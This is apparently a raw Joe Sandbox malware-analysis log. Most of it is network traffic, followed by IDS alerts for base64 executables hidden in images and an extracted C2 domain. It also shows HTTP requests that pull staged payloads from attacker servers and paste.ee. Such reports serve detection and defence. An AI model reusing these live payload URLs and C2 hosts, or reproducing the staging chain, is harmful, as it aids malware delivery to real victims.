            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49172

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2047750 ET TROJAN Base64 Encoded MZ In Image 188.114.97.3:443 -> 192.168.2.22:49174
            Source: TrafficSnort IDS: 2018856 ET TROJAN Windows executable base64 encoded 188.114.97.3:443 -> 192.168.2.22:49174
            Source: TrafficSnort IDS: 2025012 ET TROJAN Powershell commands sent B64 3 188.114.97.3:443 -> 192.168.2.22:49174
            Source: TrafficSnort IDS: 2049038 ET TROJAN Malicious Base64 Encoded Payload In Image 188.114.97.3:443 -> 192.168.2.22:49174
            Source: TrafficSnort IDS: 2020423 ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 1 M1 198.46.178.154:80 -> 192.168.2.22:49175
            Source: TrafficSnort IDS: 2020424 ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 2 M1 198.46.178.154:80 -> 192.168.2.22:49175
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 188.114.97.3 443Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeDomain query: paste.ee
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: sembe.duckdns.org
            Connects to a pastebin service (likely for C&C)
            Source: unknownDNS query: name: paste.ee
            Uses dynamic DNS services
            Source: unknownDNS query: name: sembe.duckdns.org
            Yara detected Generic Downloader
            Source: Yara matchFile source: 12.2.powershell.exe.93c0000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.502494701.00000000093C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 194.187.251.115:14645
            Source: incontrovertido.vbs.13.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
            Source: incontrovertido.vbs.13.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
            Source: global trafficHTTP traffic detected: GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1Host: uploaddeimagens.com.br
            Source: global trafficHTTP traffic detected: GET /100500/HWE.txt HTTP/1.1Host: 198.46.178.154Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 54.241.153.192 54.241.153.192
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
            Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
            Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
            Source: global trafficHTTP traffic detected: GET /d/iuC2i HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: paste.eeConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /nLNG HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: z2.inkConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /100500/vff/lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.154Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /100500/lionsandtigerbeautifulpicture.bmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.154Connection: Keep-Alive
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49173 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,17_2_0041B380
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\940091CF.emfJump to behavior
            Source: global trafficHTTP traffic detected: GET /d/iuC2i HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: paste.eeConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1Host: uploaddeimagens.com.br
